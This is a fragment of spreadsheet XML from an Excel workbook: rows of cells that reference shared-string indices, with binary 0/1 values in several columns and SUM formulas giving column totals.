        <v>1</v>
      </c>
      <c r="E76" s="20">
        <v>0</v>
      </c>
      <c r="F76" s="3" t="s">
        <v>1671</v>
      </c>
      <c r="G76">
        <v>1</v>
      </c>
      <c r="H76">
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A77" s="3" t="s">
        <v>1635</v>
      </c>
      <c r="B77" s="3" t="s">
        <v>1634</v>
      </c>
      <c r="C77" s="3" t="s">
        <v>1672</v>
      </c>
      <c r="D77" s="20">
        <v>1</v>
      </c>
      <c r="E77" s="20">
        <v>1</v>
      </c>
      <c r="F77" s="3" t="s">
        <v>1672</v>
      </c>
      <c r="G77">
        <v>1</v>
      </c>
      <c r="H77">
        <v>1</v>
      </c>
    </row>
    <row r="78" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A78" s="3" t="s">
        <v>1635</v>
      </c>
      <c r="B78" s="3" t="s">
        <v>1634</v>
      </c>
      <c r="C78" s="3" t="s">
        <v>1672</v>
      </c>
      <c r="D78" s="20">
        <v>1</v>
      </c>
      <c r="E78" s="20">
        <v>1</v>
      </c>
      <c r="F78" s="3" t="s">
        <v>1672</v>
      </c>
      <c r="G78">
        <v>1</v>
      </c>
      <c r="H78">
        <v>1</v>
      </c>
    </row>
    <row r="79" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A79" s="3" t="s">
        <v>1278</v>
      </c>
      <c r="B79" s="3" t="s">
        <v>65</v>
      </c>
      <c r="C79" s="3" t="s">
        <v>1916</v>
      </c>
      <c r="D79" s="20">
        <v>0</v>
      </c>
      <c r="E79" s="20">
        <v>0</v>
      </c>
      <c r="F79" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="G79">
        <v>1</v>
      </c>
      <c r="H79">
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A80" s="3" t="s">
        <v>1636</v>
      </c>
      <c r="B80" s="3" t="s">
        <v>1637</v>
      </c>
      <c r="C80" s="3" t="s">
        <v>1673</v>
      </c>
      <c r="D80" s="20">
        <v>1</v>
      </c>
      <c r="E80" s="20">
        <v>1</v>
      </c>
      <c r="F80" s="3" t="s">
        <v>1673</v>
      </c>
      <c r="G80">
        <v>1</v>
      </c>
      <c r="H80">
        <v>1</v>
      </c>
    </row>
    <row r="81" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A81" s="3" t="s">
        <v>1638</v>
      </c>
      <c r="B81" s="3" t="s">
        <v>1639</v>
      </c>
      <c r="C81" s="3" t="s">
        <v>1639</v>
      </c>
      <c r="D81" s="20">
        <v>1</v>
      </c>
      <c r="E81" s="20">
        <v>1</v>
      </c>
      <c r="F81" s="3" t="s">
        <v>1639</v>
      </c>
      <c r="G81">
        <v>1</v>
      </c>
      <c r="H81">
        <v>1</v>
      </c>
    </row>
    <row r="82" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A82" s="3" t="s">
        <v>1640</v>
      </c>
      <c r="B82" s="3" t="s">
        <v>1641</v>
      </c>
      <c r="C82" s="3" t="s">
        <v>1674</v>
      </c>
      <c r="D82" s="20">
        <v>1</v>
      </c>
      <c r="E82" s="20">
        <v>1</v>
      </c>
      <c r="F82" s="3" t="s">
        <v>1674</v>
      </c>
      <c r="G82">
        <v>1</v>
      </c>
      <c r="H82">
        <v>1</v>
      </c>
    </row>
    <row r="83" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A83" s="3" t="s">
        <v>1642</v>
      </c>
      <c r="B83" s="3" t="s">
        <v>1643</v>
      </c>
      <c r="C83" s="3" t="s">
        <v>1675</v>
      </c>
      <c r="D83" s="20">
        <v>1</v>
      </c>
      <c r="E83" s="20">
        <v>1</v>
      </c>
      <c r="F83" s="3" t="s">
        <v>1675</v>
      </c>
      <c r="G83">
        <v>1</v>
      </c>
      <c r="H83">
        <v>1</v>
      </c>
    </row>
    <row r="84" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A84" s="3" t="s">
        <v>1644</v>
      </c>
      <c r="B84" s="3" t="s">
        <v>1645</v>
      </c>
      <c r="C84" s="3" t="s">
        <v>1645</v>
      </c>
      <c r="D84" s="20">
        <v>1</v>
      </c>
      <c r="E84" s="20">
        <v>1</v>
      </c>
      <c r="F84" s="3" t="s">
        <v>1645</v>
      </c>
      <c r="G84">
        <v>1</v>
      </c>
      <c r="H84">
        <v>1</v>
      </c>
    </row>
    <row r="85" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A85" s="3" t="s">
        <v>1646</v>
      </c>
      <c r="B85" s="3" t="s">
        <v>1647</v>
      </c>
      <c r="C85" s="3" t="s">
        <v>1647</v>
      </c>
      <c r="D85" s="20">
        <v>1</v>
      </c>
      <c r="E85" s="20">
        <v>1</v>
      </c>
      <c r="F85" s="3" t="s">
        <v>1647</v>
      </c>
      <c r="G85">
        <v>1</v>
      </c>
      <c r="H85">
        <v>1</v>
      </c>
    </row>
    <row r="86" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A86" s="3" t="s">
        <v>1648</v>
      </c>
      <c r="B86" s="3" t="s">
        <v>1649</v>
      </c>
      <c r="C86" s="3" t="s">
        <v>1649</v>
      </c>
      <c r="D86" s="20">
        <v>1</v>
      </c>
      <c r="E86" s="20">
        <v>1</v>
      </c>
      <c r="F86" s="3" t="s">
        <v>1649</v>
      </c>
      <c r="G86">
        <v>1</v>
      </c>
      <c r="H86">
        <v>1</v>
      </c>
    </row>
    <row r="87" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A87" s="3" t="s">
        <v>1650</v>
      </c>
      <c r="B87" s="3" t="s">
        <v>1651</v>
      </c>
      <c r="C87" s="3" t="s">
        <v>1651</v>
      </c>
      <c r="D87" s="20">
        <v>1</v>
      </c>
      <c r="E87" s="20">
        <v>1</v>
      </c>
      <c r="F87" s="3" t="s">
        <v>1651</v>
      </c>
      <c r="G87">
        <v>1</v>
      </c>
      <c r="H87">
        <v>1</v>
      </c>
    </row>
    <row r="88" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A88" s="3" t="s">
        <v>1652</v>
      </c>
      <c r="B88" s="3" t="s">
        <v>1653</v>
      </c>
      <c r="C88" s="3" t="s">
        <v>1676</v>
      </c>
      <c r="D88" s="20">
        <v>1</v>
      </c>
      <c r="E88" s="20">
        <v>1</v>
      </c>
      <c r="F88" s="3" t="s">
        <v>1676</v>
      </c>
      <c r="G88">
        <v>1</v>
      </c>
      <c r="H88">
        <v>1</v>
      </c>
    </row>
    <row r="89" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A89" s="3" t="s">
        <v>1654</v>
      </c>
      <c r="B89" s="3" t="s">
        <v>1655</v>
      </c>
      <c r="C89" s="3" t="s">
        <v>1655</v>
      </c>
      <c r="D89" s="20">
        <v>1</v>
      </c>
      <c r="E89" s="20">
        <v>1</v>
      </c>
      <c r="F89" s="3" t="s">
        <v>1655</v>
      </c>
      <c r="G89">
        <v>1</v>
      </c>
      <c r="H89">
        <v>1</v>
      </c>
    </row>
    <row r="90" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A90" s="3" t="s">
        <v>1656</v>
      </c>
      <c r="B90" s="3" t="s">
        <v>1657</v>
      </c>
      <c r="C90" s="3" t="s">
        <v>1677</v>
      </c>
      <c r="D90" s="20">
        <v>1</v>
      </c>
      <c r="E90" s="20">
        <v>1</v>
      </c>
      <c r="F90" s="3" t="s">
        <v>1677</v>
      </c>
      <c r="G90">
        <v>1</v>
      </c>
      <c r="H90">
        <v>1</v>
      </c>
    </row>
    <row r="91" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A91" s="3" t="s">
        <v>1658</v>
      </c>
      <c r="B91" s="3" t="s">
        <v>1659</v>
      </c>
      <c r="C91" s="3" t="s">
        <v>1678</v>
      </c>
      <c r="D91" s="20">
        <v>1</v>
      </c>
      <c r="E91" s="20">
        <v>1</v>
      </c>
      <c r="F91" s="3" t="s">
        <v>1678</v>
      </c>
      <c r="G91">
        <v>1</v>
      </c>
      <c r="H91">
        <v>1</v>
      </c>
    </row>
    <row r="92" spans="1:8" s="19" customFormat="1" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A92" s="3"/>
      <c r="B92" s="3" t="s">
        <v>1680</v>
      </c>
      <c r="C92" s="3" t="s">
        <v>1682</v>
      </c>
      <c r="D92" s="20">
        <v>0</v>
      </c>
      <c r="E92" s="20">
        <v>0</v>
      </c>
      <c r="F92" s="3" t="s">
        <v>1682</v>
      </c>
      <c r="G92" s="19">
        <v>0</v>
      </c>
      <c r="H92" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="93" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A93" s="3" t="s">
        <v>1660</v>
      </c>
      <c r="B93" s="3" t="s">
        <v>1681</v>
      </c>
      <c r="C93" s="3" t="s">
        <v>1681</v>
      </c>
      <c r="D93" s="20">
        <v>1</v>
      </c>
      <c r="E93" s="20">
        <v>1</v>
      </c>
      <c r="F93" s="3" t="s">
        <v>1681</v>
      </c>
      <c r="G93">
        <v>1</v>
      </c>
      <c r="H93">
        <v>1</v>
      </c>
    </row>
    <row r="94" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A94" s="3"/>
      <c r="B94" s="3" t="s">
        <v>1683</v>
      </c>
      <c r="C94" s="3" t="s">
        <v>1683</v>
      </c>
      <c r="D94" s="20">
        <v>1</v>
      </c>
      <c r="E94" s="20">
        <v>1</v>
      </c>
      <c r="F94" s="3" t="s">
        <v>1683</v>
      </c>
      <c r="G94" s="19">
        <v>1</v>
      </c>
      <c r="H94" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="95" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A95" s="3"/>
      <c r="B95" s="3" t="s">
        <v>1683</v>
      </c>
      <c r="C95" s="3" t="s">
        <v>1683</v>
      </c>
      <c r="D95" s="20">
        <v>1</v>
      </c>
      <c r="E95" s="20">
        <v>1</v>
      </c>
      <c r="F95" s="3" t="s">
        <v>1683</v>
      </c>
      <c r="G95" s="19">
        <v>1</v>
      </c>
      <c r="H95" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="96" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A96" s="3"/>
      <c r="B96" s="3" t="s">
        <v>1684</v>
      </c>
      <c r="C96" s="3" t="s">
        <v>1684</v>
      </c>
      <c r="D96" s="20">
        <v>1</v>
      </c>
      <c r="E96" s="20">
        <v>1</v>
      </c>
      <c r="F96" s="3" t="s">
        <v>1684</v>
      </c>
      <c r="G96" s="19">
        <v>1</v>
      </c>
      <c r="H96" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="97" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A97" s="3" t="s">
        <v>1661</v>
      </c>
      <c r="B97" s="3" t="s">
        <v>1685</v>
      </c>
      <c r="C97" s="3" t="s">
        <v>1685</v>
      </c>
      <c r="D97" s="20">
        <v>1</v>
      </c>
      <c r="E97" s="20">
        <v>1</v>
      </c>
      <c r="F97" s="3" t="s">
        <v>1685</v>
      </c>
      <c r="G97" s="19">
        <v>1</v>
      </c>
      <c r="H97" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="98" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A98" s="3" t="s">
        <v>1662</v>
      </c>
      <c r="B98" s="3" t="s">
        <v>1663</v>
      </c>
      <c r="C98" s="3" t="s">
        <v>1663</v>
      </c>
      <c r="D98" s="20">
        <v>1</v>
      </c>
      <c r="E98" s="20">
        <v>1</v>
      </c>
      <c r="F98" s="3" t="s">
        <v>1663</v>
      </c>
      <c r="G98" s="19">
        <v>1</v>
      </c>
      <c r="H98" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="99" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A99" s="3"/>
      <c r="B99" s="3" t="s">
        <v>1687</v>
      </c>
      <c r="C99" s="3" t="s">
        <v>1687</v>
      </c>
      <c r="D99" s="20">
        <v>1</v>
      </c>
      <c r="E99" s="20">
        <v>1</v>
      </c>
      <c r="F99" s="3" t="s">
        <v>1687</v>
      </c>
      <c r="G99" s="19">
        <v>1</v>
      </c>
      <c r="H99" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="100" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A100" s="3" t="s">
        <v>1664</v>
      </c>
      <c r="B100" s="3" t="s">
        <v>1686</v>
      </c>
      <c r="C100" s="3" t="s">
        <v>1686</v>
      </c>
      <c r="D100" s="20">
        <v>1</v>
      </c>
      <c r="E100" s="20">
        <v>1</v>
      </c>
      <c r="F100" s="3" t="s">
        <v>1686</v>
      </c>
      <c r="G100" s="19">
        <v>1</v>
      </c>
      <c r="H100" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="101" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A101" s="3"/>
      <c r="B101" s="3" t="s">
        <v>1688</v>
      </c>
      <c r="C101" s="3" t="s">
        <v>1688</v>
      </c>
      <c r="D101" s="20">
        <v>1</v>
      </c>
      <c r="E101" s="20">
        <v>1</v>
      </c>
      <c r="F101" s="3" t="s">
        <v>1688</v>
      </c>
      <c r="G101" s="19">
        <v>1</v>
      </c>
      <c r="H101" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="102" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A102" s="3" t="s">
        <v>1665</v>
      </c>
      <c r="B102" s="3" t="s">
        <v>1405</v>
      </c>
      <c r="C102" s="3" t="s">
        <v>1405</v>
      </c>
      <c r="D102" s="20">
        <v>1</v>
      </c>
      <c r="E102" s="20">
        <v>1</v>
      </c>
      <c r="F102" s="3" t="s">
        <v>1405</v>
      </c>
      <c r="G102" s="19">
        <v>1</v>
      </c>
      <c r="H102" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="103" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A103" s="3"/>
      <c r="B103" s="3" t="s">
        <v>1126</v>
      </c>
      <c r="C103" s="3" t="s">
        <v>1126</v>
      </c>
      <c r="D103" s="20">
        <v>1</v>
      </c>
      <c r="E103" s="20">
        <v>1</v>
      </c>
      <c r="F103" s="3" t="s">
        <v>1126</v>
      </c>
      <c r="G103" s="19">
        <v>1</v>
      </c>
      <c r="H103" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="104" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A104" s="3" t="s">
        <v>1666</v>
      </c>
      <c r="B104" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C104" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="D104" s="20">
        <v>0</v>
      </c>
      <c r="E104" s="20">
        <v>0</v>
      </c>
      <c r="F104" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="G104">
        <v>0</v>
      </c>
      <c r="H104">
        <v>0</v>
      </c>
    </row>
    <row r="105" spans="1:8" ht="138" x14ac:dyDescent="0.25">
      <c r="A105" s="3" t="s">
        <v>1667</v>
      </c>
      <c r="B105" s="3" t="s">
        <v>1668</v>
      </c>
      <c r="C105" s="3" t="s">
        <v>1679</v>
      </c>
      <c r="D105" s="20">
        <v>1</v>
      </c>
      <c r="E105" s="20">
        <v>1</v>
      </c>
      <c r="F105" s="3" t="s">
        <v>1679</v>
      </c>
      <c r="G105">
        <v>1</v>
      </c>
      <c r="H105">
        <v>1</v>
      </c>
    </row>
    <row r="106" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A106" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D106" s="6">
        <f>SUM(D64:D105)</f>
        <v>38</v>
      </c>
      <c r="E106" s="6">
        <f t="shared" ref="E106:H106" si="1">SUM(E64:E105)</f>
        <v>35</v>
      </c>
      <c r="F106" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G106" s="6">
        <f t="shared" si="1"/>
        <v>40</v>
      </c>
      <c r="H106" s="6">
        <f t="shared" si="1"/>
        <v>35</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A62:H62"/>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C96A7-40A2-4030-875D-CCD3D6A4509E}">
  <dimension ref="A1:H71"/>
  <sheetViews>
    <sheetView topLeftCell="A59" zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="H52" sqref="H52:H70"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="26.6640625" customWidth="1"/>
    <col min="2" max="2" width="26.77734375" customWidth="1"/>
    <col min="3" max="3" width="26.5546875" customWidth="1"/>
    <col min="4" max="4" width="10.33203125" customWidth="1"/>
    <col min="5" max="5" width="10" customWidth="1"/>
    <col min="6" max="6" width="26.6640625" customWidth="1"/>
    <col min="7" max="7" width="10.88671875" customWidth="1"/>
    <col min="8" max="8" width="10.44140625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="26.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>716</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ht="27.6" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>717</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>718</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>718</v>
      </c>
      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>718</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>719</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>720</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>720</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>720</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>721</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>722</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>722</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>722</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>723</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>724</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>724</v>
      </c>
      <c r="D7">
        <v>1</v>
      </c>
      <c r="E7">
        <v>1</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>724</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>725</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>726</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>726</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>797</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>727</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>728</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>728</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>728</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>729</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>730</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>730</v>
      </c>
      <c r="D10">
        <v>1</v>
      </c>
      <c r="E10">
        <v>1</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>730</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>731</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>732</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>732</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>732</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>733</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>734</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>734</v>
      </c>
      <c r="D12">
        <v>1</v>
      </c>
      <c r="E12">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>734</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>735</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>736</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>736</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>736</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>737</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>738</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>738</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>1</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>738</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>739</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>740</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>740</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>740</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>741</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>742</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>742</v>
      </c>
      <c r="D16">
        <v>1</v>
      </c>
      <c r="E16">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>742</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>743</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>744</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>744</v>
      </c>
      <c r="D17">
        <v>1</v>
      </c>
      <c r="E17">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>744</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>745</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>746</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>746</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>746</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>747</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>748</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>748</v>
      </c>
      <c r="D19">
        <v>1</v>
      </c>
      <c r="E19">
        <v>1</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>748</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>749</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>750</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>750</v>
      </c>
      <c r="D20">
        <v>1</v>
      </c>
      <c r="E20">
        <v>1</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>750</v>
      </c>
      <c r="G20">
        <v>1</v>
      </c>
      <c r="H20">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>751</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>752</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>752</v>
      </c>
      <c r="D21">
        <v>1</v>
      </c>
      <c r="E21">
        <v>1</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>752</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>753</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>754</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>754</v>
      </c>
      <c r="D22">
        <v>1</v>
      </c>
      <c r="E22">
        <v>1</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>754</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>755</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>756</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>756</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>756</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>757</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>758</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>758</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>1</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>758</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>759</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>760</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>760</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>760</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>761</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>762</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>762</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>762</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A27" s="3" t="s">
        <v>763</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>764</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>764</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>764</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
